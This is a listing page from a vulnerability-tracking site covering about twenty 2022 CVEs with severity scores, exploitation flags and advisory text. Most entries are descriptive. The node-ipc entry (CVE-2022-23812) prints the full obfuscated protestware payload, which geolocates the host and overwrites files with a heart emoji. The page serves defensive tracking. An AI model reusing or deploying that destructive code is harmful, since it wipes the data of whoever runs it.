Vulnerabilities Exploited in the Wild with Public PoC
Updated 5h agoSearch and track vulnerabilities with real-time exploit intelligence. Cross-reference CVEs against public exploits from ExploitDB, Metasploit, GitHub, and Nuclei — with CVSS and EPSS scoring, CISA KEV monitoring, and AI-powered exploit analysis.
2,391 results
Clear all
CVE-2022-22960
7.8
HIGH
KEV
1 PoC
Analysis
EPSS 0.73
VMware Workspace ONE Access CVE-2022-22960
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to 'root'.
CWE-732
Apr 13, 2022
CVE-2022-26809
9.8
CRITICAL
EXPLOITED
RANSOMWARE
10 PoCs
Analysis
EPSS 0.93
Microsoft Windows RPC Runtime - Remote Code Execution
Remote Procedure Call Runtime Remote Code Execution Vulnerability
Apr 15, 2022
CVE-2022-22954
9.8
CRITICAL
KEV
RANSOMWARE
28 PoCs
Analysis
NUCLEI
EPSS 0.94
VMware Workspace ONE Access CVE-2022-22954
VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.
CWE-94
Apr 11, 2022
CVE-2022-1329
8.8
HIGH
EXPLOITED
7 PoCs
Analysis
NUCLEI
EPSS 0.93
Elementor Website Builder < 3.6.2 - Missing Authorization
The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to obtain remote code execution, in versions 3.6.0 to 3.6.2.
CWE-862
Apr 19, 2022
CVE-2022-24521
7.8
HIGH
KEV
RANSOMWARE
1 PoC
Analysis
EPSS 0.08
Windows Common Log File System Driver - Privilege Escalation
Windows Common Log File System Driver Elevation of Privilege Vulnerability
CWE-787
Apr 15, 2022
CVE-2022-22965
9.8
CRITICAL
KEV
RANSOMWARE
119 PoCs
Analysis
NUCLEI
EPSS 0.94
Vmware Spring Framework < 5.2.20 - Code Injection
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
CWE-94
Apr 01, 2022
CVE-2022-1040
9.8
CRITICAL
KEV
RANSOMWARE
8 PoCs
Analysis
NUCLEI
EPSS 0.94
Sophos Sfos < 18.5.3 - Authentication Bypass
An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.
Mar 25, 2022
CVE-2022-1096
8.8
HIGH
KEV
1 PoC
Analysis
EPSS 0.38
Google Chrome < 99.0.4844.84 - Type Confusion
Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
CWE-843
Jul 23, 2022
CVE-2022-0543
10.0
CRITICAL
KEV
9 PoCs
Analysis
NUCLEI
EPSS 0.94
Redis Lua Sandbox Escape
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
CWE-862
Feb 18, 2022
CVE-2022-26318
9.8
CRITICAL
KEV
6 PoCs
Analysis
EPSS 0.92
WatchGuard XTM Firebox Unauthenticated Remote Command Execution
On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2.
Mar 04, 2022
CVE-2022-21999
7.8
HIGH
KEV
RANSOMWARE
2 PoCs
Analysis
EPSS 0.74
Windows Print Spooler - Privilege Escalation
Windows Print Spooler Elevation of Privilege Vulnerability
CWE-22
Feb 09, 2022
CVE-2022-24934
9.8
CRITICAL
EXPLOITED
5 PoCs
Analysis
EPSS 0.32
Wps Office < 11.2.0.10382 - Remote Code Execution
wpsupdater.exe in Kingsoft WPS Office through 11.2.0.10382 allows remote code execution by modifying HKEY_CURRENT_USER in the registry.
Mar 23, 2022
CVE-2022-23812
9.8
CRITICAL
EXPLOITED
1 PoC
Analysis
EPSS 0.09
node-ipc <10.1.3 - Code Injection
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
Mar 16, 2022
CVE-2022-26485
8.8
HIGH
KEV
1 PoC
Analysis
EPSS 0.07
Firefox < 97.0.2 - Use After Free
Removing an XSLT parameter during processing could have lead to an exploitable use-after-free. We have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0.
CWE-416
Dec 22, 2022
CVE-2022-20699
10.0
CRITICAL
KEV
7 PoCs
Analysis
EPSS 0.90
Cisco Rv340 Firmware < 1.0.03.24 - Denial of Service
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
CWE-1284
Feb 10, 2022
CVE-2022-23134
3.7
LOW
KEV
1 PoC
Analysis
NUCLEI
EPSS 0.93
Zabbix < 5.4.8 - Improper Access Control
After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
CWE-284
Jan 13, 2022
CVE-2022-23131
9.1
CRITICAL
KEV
22 PoCs
Analysis
NUCLEI
EPSS 0.94
Zabbix < 5.4.8 - Authentication Bypass by Spoofing
In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Malicious unauthenticated actor may exploit this issue to escalate privileges and gain admin access to Zabbix Frontend. To perform the attack, SAML authentication is required to be enabled and the actor has to know the username of Zabbix user (or use the guest account, which is disabled by default).
CWE-290
Jan 13, 2022
CVE-2022-24086
9.8
CRITICAL
KEV
10 PoCs
Analysis
NUCLEI
EPSS 0.94
Adobe Commerce <2.4.3-p1, <2.3.7-p2 - RCE
Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.
CWE-20
Feb 16, 2022
CVE-2022-22620
8.8
HIGH
KEV
3 PoCs
Analysis
EPSS 0.04
Apple <15.3 - Use After Free
A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..
CWE-416
Mar 18, 2022
CVE-2022-21882
7.0
HIGH
KEV
7 PoCs
Analysis
EPSS 0.90
Win32k ConsoleControl Offset Confusion
Win32k Elevation of Privilege Vulnerability
CWE-787
Jan 11, 2022